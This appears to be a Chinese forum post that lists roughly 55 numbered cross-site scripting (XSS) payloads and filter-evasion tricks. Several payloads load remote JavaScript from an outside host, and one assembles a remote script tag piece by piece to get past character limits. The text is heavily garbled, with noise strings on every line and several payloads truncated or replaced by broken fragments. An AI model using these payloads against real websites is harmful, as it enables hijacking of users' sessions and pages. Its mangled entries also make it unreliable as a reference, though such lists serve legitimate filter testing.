(1)普通的XSS JavaScript注入
2 w9 f+ M' ~% Q& q! t<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>" h# i* V: G- u1 ]6 b2 @
(99)另类弹框5 Y# c* ~" h5 w1 q r- A
<q/oncut=alert()>14 m8 i& A" N P% W9 t5 {
<s/onclick=alert()>b
$ R- z# l% u# N2 p$ h% `+ z1 @ <XSS=" onclick="alert(1)//">clickme</SSX=">
3 A; a' }$ N1 F4 P# `% e) |7 T' Z <zzz onclick=alert`1`>clickme</zzz>
1 o% _8 T# d! v) W% \- u7 { <a onclick=alert`1`>clickme</a>
7 ]+ x& M L# t0 z7 h2 b<a=">clickme</a=">% D' X$ l. U/ H) A( }& [& @/ s9 }
<a=">clickme</a># O- l; D7 U# O9 l R( @- h3 u
<z=">clickme</z=">
1 ]% \% N) o/ \% v: J1 O2 E8 Y<z onclick=alert`1`>clickme</z>
9 n( u9 I+ }; E+ O9 j( |5 p- o( G. |# p `
(2)IMG标签XSS使用JavaScript命令, _( M. j, |. X# r7 @0 ?: Z6 u
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 J% p$ |/ z; w7 ^, s2 H* j9 P- D3 o- [! u v5 G# G
(3)IMG标签无分号无引号. B2 Q5 A' A" y9 G$ _
<IMG SRC=javascript:alert(‘XSS’)>
Y7 y2 H* q5 A) ^; n5 M) X7 ~0 _7 |$ c
(4)IMG标签大小写不敏感* B; V2 p8 g6 |
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>0 S0 P7 M; w) |. f) A
2 o1 r% w) v0 Z& y
(5)HTML编码(必须有分号)
+ B1 x2 N! O6 C$ M+ _. O) n<IMG SRC=javascript:alert(“XSS”)>
. c+ f) [) l. x& v2 _ L7 Y6 u8 b9 N) s) t2 ~2 }* W
(6)修正缺陷IMG标签
- l5 A$ W9 m* z4 P( o0 q: m3 K& r<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>, i) M4 t5 T5 C1 G3 b5 d0 o
7 q/ z5 |' f' d(7)formCharCode标签(计算器)& B$ @: y+ T8 A
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> T- c r: g# `
- v( Y% t0 j( U Y(8)UTF-8的Unicode编码(计算器)
! B/ s P* I1 Y" }2 D3 H) S9 s; ?<IMG SRC=jav..省略..S')>
& `6 _, n' w2 @. X6 L) e& u* A$ o r$ X0 g
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)4 F& M; }( s+ o4 }2 J3 z
<IMG SRC=jav..省略..S')>
9 ~+ q' C% V+ ^3 o; ]% [1 T: K/ d* x
6 Z3 N z @2 A+ J! C1 J(10)十六进制编码也是没有分号(计算器)
F6 y9 v y4 p% F<IMG SRC=\'#\'" /span>$ L: k7 q: Q$ ] {
/ }' @! i- l8 Q(11)嵌入式标签,将Javascript分开1 ]* o9 O. M3 m' \7 M$ Z4 K
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
/ J U8 R# S% R Z- n9 q
0 K) [% N# a- d6 Z9 O(12)嵌入式编码标签,将Javascript分开6 s& T7 e' D' t# U
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
' o' f8 O! O6 S# s/ q4 j6 _
; |, Y0 c+ t' k$ }0 W0 M3 g% b2 K8 ](13)嵌入式换行符 O4 B X7 L) F- D/ X
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>7 j7 L0 S6 m Q4 L5 J
) l6 v' w" A- U9 c$ B9 K5 o9 a
(14)嵌入式回车! d& O Q( i, p
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
: W# ]( u& s& n$ V3 ^( D% I2 s
4 z% B2 |; s+ i i(15)嵌入式多行注入JavaScript,这是XSS极端的例子: a4 H% N; h5 Z P: o5 @$ Z
<IMG SRC=\'#\'" /span># ~2 m# Q1 ]$ ~4 V& a
3 ?; A5 I/ K# I9 r
(16)解决限制字符(要求同页面)
' K; _6 \ P6 [, Q; l<script>z=’document.’</script>; W7 E( p P# n: v" W9 {
<script>z=z+’write(“‘</script>$ K7 H' p* E& |7 h5 }3 i9 N
<script>z=z+’<script’</script>
, i. V( B, Q. H0 N<script>z=z+’ src=ht’</script>
! H, w3 m; o$ F; m9 [( Q<script>z=z+’tp://ww’</script>8 W1 k0 K1 ^7 ^6 z1 M
<script>z=z+’w.shell’</script>- E1 I8 O7 _( b" a- N
<script>z=z+’.net/1.’</script>4 [1 y% ]5 G; ~3 v0 o1 N+ N
<script>z=z+’js></sc’</script>
4 k; u+ }' o. ^% M<script>z=z+’ript>”)’</script>
7 F, \! v) M/ S$ V; h' s<script>eval_r(z)</script>" x7 B- W) U6 C# o& T
2 x% _$ @$ y: R1 @# q(17)空字符 _/ C4 N7 N7 n! U! |; K! a* l4 n
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
/ r% z9 b6 q/ l0 X. w6 P A. w& S
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用* B! O# `' q& K( Y
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out. N9 g) C1 N! ~% K5 O
4 A3 P9 p8 _0 Z; d+ |- b
(19)Spaces和meta前的IMG标签8 D' I0 y4 |- ?% U2 `' p, \' i! U T
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>& V9 k; V: d3 b3 f% x# L
( m/ {0 [# U5 }8 }9 F8 {
(20)Non-alpha-non-digit XSS
" S- F, W/ y* g<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
( L( w# [% [# R' _$ A* ?; Y2 a
9 I) w( `, Y# n& K(21)Non-alpha-non-digit XSS to 2
! n7 h. O& p( X& }, s<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
3 a. t9 d$ b! Q' K/ ?8 }! }" }5 r) H2 g" ]% J: l' r
(22)Non-alpha-non-digit XSS to 3
$ |1 d: C7 |: F<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
1 b' K; M$ A; i. S! D W% w t' i) V2 a0 ?# H; B
(23)双开括号. O3 O% N6 k/ F0 K5 T; H
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
# P8 ^5 S9 x, P5 q/ d! i
# T. e' w, C7 _7 f# G( `(24)无结束脚本标记(仅火狐等浏览器)3 X+ Q9 x0 T1 F' }1 u* _* F* A
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
# c5 ~1 i+ U: Y' D1 ?! V0 K+ o; B+ u7 J9 W6 X# _' G
(25)无结束脚本标记20 f- P3 B; o9 p4 v+ M3 U, |
<SCRIPT SRC=//3w.org/XSS/xss.js>
M" f; z4 }/ o, C2 m
+ k8 T- B* Y' ]/ C(26)半开的HTML/JavaScript XSS
2 |; F. m: U9 [0 h4 m. `/ f<IMG SRC=\'#\'" /span># W' O2 { B! V% y4 _# Y. M
* ^+ c6 h+ ]6 f& k
(27)双开角括号
: s. l, \9 _: Q# a8 h# z<iframe src=http://3w.org/XSS.html <
q% w+ c d, p6 @- X
- {$ |" w0 |1 e* I9 K(28)无单引号 双引号 分号
p; ^- k* D& _8 f<SCRIPT>a=/XSS/
9 U7 h$ u3 P# p) {# b9 n; lalert(a.source)</SCRIPT>
1 Z' n% K9 g G9 b2 `
# B, v, w4 ~) E7 I3 A, n(29)换码过滤的JavaScript
1 ]% D. Y: r. ^: W7 K' U" v4 Z6 C/ p\”;alert(‘XSS’);//+ B" I4 _) l) @. O* c: U
9 q: h! E4 {" z0 W' g6 H7 ~* }7 u(30)结束Title标签& L+ l9 e" {* C; X$ d/ @, \2 N
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>: ~, e3 a- S7 `. I
. V$ |# a6 z) s2 S) ^1 F) ^1 C
(31)Input Image
" d! s1 W! x0 t2 r<INPUT SRC=\'#\'" /span>
! i! E( e9 s8 F+ l8 N$ H! |$ d, H }" l- { C A
(32)BODY Image( v& c# v t4 ^8 Z3 P
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* _/ q) |9 Z! u+ A- I" X. S/ ?7 R+ u& D" Q: t
(33)BODY标签
7 ~6 h; G$ q" R. d9 d<BODY(‘XSS’)>; H, f3 c% w- x1 q2 G
7 e) `: B/ ?; @1 [
(34)IMG Dynsrc
& {( s% b9 w+ d. I& Z<IMG DYNSRC=\'#\'" /span>
' n" ]! `1 m* ~4 N
6 F( r( U3 P0 T5 h0 {" V8 m& {(35)IMG Lowsrc
" o: t) a! ~6 k2 O9 x. ]<IMG LOWSRC=\'#\'" /span>* F6 Q0 r s2 `' _
0 Q% W# ~& P! w
(36)BGSOUND
$ m! Z2 L1 X: x1 j% z<BGSOUND SRC=\'#\'" /span>3 n W5 I* K% e- K
( ?/ k' C/ H& m/ [7 L G
(37)STYLE sheet
O1 J1 O t6 ~( ^! K/ }<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”># ?( v' H: S; @
2 \/ R4 h6 _9 K* x7 S: ^
(38)远程样式表% Y# S1 h, {4 ^- o8 ?
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
& O2 u( }: b! y% J, l; v/ H
6 E% i! W! j, {- @( Z* \(39)List-style-image(列表式)
1 e! s" i; j% N! _% l$ k<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS r) ?4 Q/ ]+ e1 F3 n
0 O4 R% X* I; L3 ?& q, i8 j1 T(40)IMG VBscript3 p. e# S* {. ~+ u. f/ i
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS4 q* A% n6 O: z6 h
2 g! [: g4 m/ t7 u; t
(41)META链接url
, D+ i" D7 L& U* f; k3 Y' i2 c<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
& g8 C! i/ N/ a- b( v2 @ V8 p4 r$ \# |) W
(42)Iframe6 F# q$ K4 ? ?; m5 G9 j. J$ W5 [
<IFRAME SRC=\'#\'" /IFRAME>; f) s+ ~$ a& P- X5 `1 h
0 t# t8 d: e! P# F: n4 Y0 H
(43)Frame6 O( j V& O0 B8 ^5 J% N
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>& I; B' u0 t# }% K
! d& N+ `, y. Q0 n! p/ e(44)Table0 f5 W2 u% Q1 l$ ]9 W
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
6 q3 |3 r9 k) O- H
# D1 ~" e- v8 Z D! S: A# C(45)TD9 j0 q/ A* W2 |* [& |1 j' L
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>8 _2 d: M3 r( M& U$ ~
+ t" k8 D$ i$ ?( R(46)DIV background-image
( T+ O2 e2 z/ i; e- ^/ R p<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
( ~) q6 U; c( i/ ~! m
0 _+ S8 F& m# t(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)( P* Z* f6 J% W+ U# C. V9 v
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>
: M& ^& d8 N: s# C3 i9 c$ P- C# k4 g0 C/ K7 d5 A
(48)DIV expression
$ l, W4 O0 o# P<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
5 g9 G q4 F4 H! K; t+ L) n$ z* k; K3 c* u& M4 H6 y; b9 j5 U
(49)STYLE属性分拆表达9 ^8 _/ f1 h0 b' K* a# ^; p
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
- B1 v3 k/ c$ k8 k9 e# K$ k/ w- ]% ]- ?6 B" S/ Y+ S' ^
(50)匿名STYLE(组成:开角号和一个字母开头)8 z2 e& X2 A* f6 x
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”># Y/ v9 j8 H# ]& z% ]. ~
, [2 V# V3 x: e! C! M! i% |(51)STYLE background-image. d" i: @2 e7 S6 q3 `- l0 I3 y
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>, N7 `0 H% X$ i6 k# v5 Z. I
& U1 f5 n, t. I$ d; x% h
(52)IMG STYLE方式% g2 c& L* \' b2 Q8 ~9 P% @& O
exppression(alert(“XSS”))’>' t% f8 u5 b5 [- l* r
% } T6 [% M) q4 y& R% U
(53)STYLE background
K$ b/ b9 L3 W0 c3 j) z<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>' v; Q" T+ k/ Z' S) U) f
6 E: F% t8 y% J: N1 n(54)BASE
( {# N$ b: Y- f7 c<BASE HREF=”javascript:alert(‘XSS’);//”>
2 P3 G5 B I% y8 O* ^: W
1 [7 H7 V$ m& b& W, n9 {(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
, U1 |5 v/ J- G- Z' N+ _<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED># \1 F9 T$ a9 M+ t$ ^4 F; y
|
发表于 2016-4-28 10:06:15
收藏
支持
反对